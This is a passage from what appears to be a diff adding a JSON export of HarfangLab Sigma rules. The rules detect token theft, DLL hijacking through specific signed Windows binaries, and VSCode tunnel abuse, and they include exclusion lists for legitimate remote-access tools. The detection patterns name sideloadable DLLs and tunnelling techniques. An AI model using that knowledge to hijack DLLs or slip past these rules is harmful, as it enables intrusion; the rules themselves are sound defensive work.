and the child process to search for malicious actions.\nreferences:\n - https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/incognito/incognito.c\n - https://attack.mitre.org/techniques/T1134/\ndate: 2023/06/20\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1134.001\n - attack.t1134.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n IntegrityLevel: 'System'\n ParentIntegrityLevel: 'High'\n\n exclusion_teamviewer:\n - ParentImage|endswith:\n - '?:\\ProgramData\\GenapiTV\\TeamViewer.exe'\n - '\\TeamViewer\\TeamViewer.exe'\n - '\\TeamViewerPortable\\TeamViewer.exe'\n - '\\AppData\\Local\\TeamViewer\\CustomConfigs\\\\*\\TeamViewer.exe'\n - '\\AppData\\Roaming\\TeamViewerMeeting\\TeamViewerMeeting.exe'\n - '\\AppData\\Local\\Temp\\TeamViewer\\Version?\\TeamViewer.exe'\n - '\\AppData\\Local\\Temp\\\\*\\TeamViewer\\Version?\\TeamViewer.exe'\n - ProcessParentOriginalFileName: 'TeamViewer.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature:\n - 'TeamViewer Germany GmbH'\n - 'TeamViewer GmbH'\n\n exclusion_mssql:\n ParentImage|endswith: '\\MSSQL\\Binn\\sqlservr.exe'\n\n exclusion_anydesk:\n - ParentImage|endswith:\n - '\\AnyDesk.exe'\n - '\\AnyDesk????.exe'\n - '\\AnyDesk_????.exe'\n - ProcessParentDescription: 'AnyDesk'\n ProcessParentSigned: 'true'\n ProcessParentSignature:\n - 'AnyDesk Software GmbH'\n - 'philandro Software GmbH'\n\n exclusion_werfault:\n Image: '?:\\Windows\\System32\\WerFault.exe'\n\n exclusion_advanced_run:\n ParentImage|endswith: '\\AdvancedRun.exe'\n\n exclusion_prohelp:\n ParentImage:\n - '?:\\Program Files\\Mattec\\ProHelp\\bin\\moller.exe'\n - '?:\\Program Files (x86)\\Mattec\\ProHelp\\bin\\moller.exe'\n\n exclusion_etdctrl:\n ParentImage: '?:\\windows\\system32\\ETDCtrl.exe'\n\n exclusion_rg_systemes_assist:\n 
OriginalFileName:\n - 'RG_Supervision.exe'\n - 'Assist.exe'\n Signed: 'true'\n Signature: 'RG Systèmes SAS'\n\n exclusion_conhost:\n Image: '?:\\Windows\\System32\\conhost.exe'\n\n exclusion_vmmem:\n ParentImage:\n - 'vmmem'\n - 'vmmemWSL'\n\n exclusion_taskkill:\n # taskkill /IM msedge.exe /F\n # taskkill /IM TDMon.exe\n CommandLine|startswith: 'taskkill /IM '\n ParentCommandLine|startswith: '?:\\Windows\\SysWOW64\\inetsrv\\w3wp.exe -ap DefaultAppPool -v '\n GrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k iissvcs'\n\n exclusion_ninite:\n CommandLine|contains: '\\AppData\\Local\\Temp\\\\????????-????-????-????-????????????\\Ninite.exe /runsetup ????????-????-????-????-????????????'\n ParentImage|endswith: '\\Ninite.exe'\n\n exclusion_dell_remote_assist:\n OriginalFileName: 'DellRemoteAssist.exe'\n Signed: 'true'\n ProcessParentOriginalFileName: 'DellRemoteAssist.exe'\n ProcessParentSigned: 'true'\n CommandLine|contains:\n - 'startup=runSystem'\n - 'startup=runElevated'\n - 'startup=systemBaseClient'\n\n exclusion_securityhealthsetup:\n ProcessImage: '?:\\Windows\\SoftwareDistribution\\Download\\Install\\securityhealthsetup.exe'\n Signed: 'true'\n\n exclusion_rustdeck1:\n OriginalFileName: 'rustdesk.exe'\n CommandLine|contains: ' --run-as-system'\n\n exclusion_rustdeck2:\n OriginalFileName: 'rustdesk.exe'\n Signed: 'true'\n Signature: 'Zhou Huabing'\n\n # https://www.navista.fr/support-technique/\n exclusion_navista:\n OriginalFileName: 'rustdesk.exe'\n Signed: 'true'\n Signature: 'PURSLANE'\n\n exclusion_ansible:\n CommandLine: 'powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand 
CgAgACAAIAAgACYAYwBoAGMAcAAuAGMAbwBtACAANgA1ADAAMAAxACAAPgAgACQAbgB1AGwAbAAKACAAIAAgACAAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQAKACAAIAAgACAAJABzAHAAbABpAHQAXwBwAGEAcgB0AHMAIAA9ACAAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByAC4AUwBwAGwAaQB0ACgAQAAoACIAYAAwAGAAMABgADAAYAAwACIAKQAsACAAMgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBSAGUAbQBvAHYAZQBFAG0AcAB0AHkARQBuAHQAcgBpAGUAcwApAAoAIAAgACAAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAGoAcwBvAG4AXwByAGEAdwAgAC0AVgBhAGwAdQBlACAAJABzAHAAbABpAHQAXwBwAGEAcgB0AHMAWwAxAF0ACgAgACAAIAAgACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAIAAgACAAIAAmACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIACgA='\n\n exclusion_paragon:\n ProcessImage: '?:\\Program Files\\Paragon Software\\Paragon Backup and Recovery\\program\\hdmengine_scriptsapp.exe'\n Signed: 'true'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "16ac2b82-bf41-4651-832f-0b67481cbba0", + "rule_name": "Possible SYSTEM Access Token Theft", + "rule_description": "Detects the suspicious creation of a process with SYSTEM privileges by a High Integrity process.\nThis can be indicative of token theft from a SYSTEM process in order to locally elevate privileges.\nIt is recommended to analyze the behavior and content of both the parent and the child process to search for malicious actions.\n", + "rule_creation_date": "2023-06-20", + "rule_modified_date": "2025-04-15", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1134.001", + "attack.t1134.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": 
"0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "16bd5dca-1018-431d-b375-f0bec118e825", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.077520Z", + "creation_date": "2026-03-23T11:45:34.077522Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.077527Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://github.com/xforcered/WFH", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_appvshnotify.yml", + "content": "title: DLL Hijacking via AppVShNotify.exe\nid: 16bd5dca-1018-431d-b375-f0bec118e825\ndescription: |\n Detects potential Windows DLL Hijacking via AppVShNotify.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious 
activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'AppVShNotify.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\userenv.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "16bd5dca-1018-431d-b375-f0bec118e825", + "rule_name": "DLL Hijacking via AppVShNotify.exe", + "rule_description": "Detects potential Windows DLL Hijacking via AppVShNotify.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + 
"rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "16c5e5af-a716-4159-bbc4-d614187f5564", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.590369Z", + "creation_date": "2026-03-23T11:45:34.590373Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.590383Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_dpiscaling.yml", + "content": "title: DLL Hijacking via dpiscaling.exe\nid: 16c5e5af-a716-4159-bbc4-d614187f5564\ndescription: |\n Detects potential Windows DLL Hijacking via dpiscaling.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each 
other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dpiscaling.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CLDAPI.dll'\n - '\\CRYPTBASE.DLL'\n - '\\edputil.dll'\n - '\\FLTLIB.DLL'\n - '\\iphlpapi.dll'\n - '\\ndfapi.dll'\n - '\\PROPSYS.dll'\n - '\\shell32.dll'\n - '\\wdi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "16c5e5af-a716-4159-bbc4-d614187f5564", + "rule_name": "DLL Hijacking via dpiscaling.exe", + "rule_description": "Detects potential Windows DLL Hijacking via dpiscaling.exe.\nDLL hijacking 
takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "16d32dde-ef35-4e0e-91a8-466d49409ba8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.075187Z", + "creation_date": "2026-03-23T11:45:34.075189Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.075194Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": 
[ + "https://wietze.github.io/blog/save-the-environment-variables", + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://github.com/xforcered/WFH", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_wlbs.yml", + "content": "title: DLL Hijacking via WLBS.exe\nid: 16d32dde-ef35-4e0e-91a8-466d49409ba8\ndescription: |\n Detects potential Windows DLL Hijacking via WLBS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WLBS.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft 
Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "16d32dde-ef35-4e0e-91a8-466d49409ba8", + "rule_name": "DLL Hijacking via WLBS.exe", + "rule_description": "Detects potential Windows DLL Hijacking via WLBS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "16e0ffc8-8668-4969-8fe3-840080ccc099", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:34.587639Z", + "creation_date": "2026-03-23T11:45:34.587643Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.587650Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/xforcered/WFH", + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://wietze.github.io/blog/save-the-environment-variables", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_bootcfg.yml", + "content": "title: DLL Hijacking via bootcfg.exe\nid: 16e0ffc8-8668-4969-8fe3-840080ccc099\ndescription: |\n Detects potential Windows DLL Hijacking via bootcfg.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bootcfg.exe'\n ImageLoaded|endswith:\n - '\\mpr.dll'\n - '\\netapi32.dll'\n - '\\sspicli.dll'\n filter_legitimate_image:\n 
Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "16e0ffc8-8668-4969-8fe3-840080ccc099", + "rule_name": "DLL Hijacking via bootcfg.exe", + "rule_description": "Detects potential Windows DLL Hijacking via bootcfg.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "171739c5-ffb8-48b2-8e6d-e688af5f311b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + 
}, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.587540Z", + "creation_date": "2026-03-23T11:45:34.587544Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.587552Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_msinfo32.yml", + "content": "title: DLL Hijacking via msinfo32.exe\nid: 171739c5-ffb8-48b2-8e6d-e688af5f311b\ndescription: |\n Detects potential Windows DLL Hijacking via msinfo32.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - 
classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msinfo32.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\fastprox.dll'\n - '\\mfc42u.dll'\n - '\\powrprof.dll'\n - '\\SLC.dll'\n - '\\sppc.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "171739c5-ffb8-48b2-8e6d-e688af5f311b", + "rule_name": "DLL Hijacking via msinfo32.exe", + "rule_description": "Detects potential Windows DLL Hijacking via msinfo32.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": 
null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "17d344bd-5969-438e-b896-775f30a96618", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.603629Z", + "creation_date": "2026-03-23T11:45:34.603632Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.603639Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/", + "https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/", + "https://ipfyx.fr/post/visual-studio-code-tunnel/", + "https://code.visualstudio.com/docs/remote/tunnels", + "https://attack.mitre.org/techniques/T1572/", + "https://attack.mitre.org/techniques/T1090/", + "https://attack.mitre.org/techniques/T1567/" + ], + "name": "t1090_vs_code_tunnel_commandline.yml", + "content": "title: VSCode Proxy Tunnel Started via Command-line (Windows)\nid: 17d344bd-5969-438e-b896-775f30a96618\ndescription: |\n This rule detects the VSCode binary being used with a command-line indicating a network 
tunnel.\n Since July 2023, Microsoft has added a feature that allows users to share their Visual Studio Desktop on the web through its own tunnel.\n This allows attackers to connect to a remote machine and potentially bypass any network counter-measures.\n It is recommended to investigate the actions performed in the shell that this tunnel spawns to determine if it is legitimate developer activity.\nreferences:\n - https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/\n - https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/\n - https://ipfyx.fr/post/visual-studio-code-tunnel/\n - https://code.visualstudio.com/docs/remote/tunnels\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/techniques/T1567/\ndate: 2023/09/25\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_cmd:\n CommandLine|contains: ' tunnel'\n\n selection_image:\n Image|endswith:\n - '\\code.exe'\n - '\\codium.exe'\n Signed: 'true'\n\n selection_peinfo:\n OriginalFileName: 'electron.exe'\n Description: 'Visual Studio Code'\n\n condition: selection_cmd and (selection_image or selection_peinfo)\nlevel: high\n#level: medium\nconfidence: 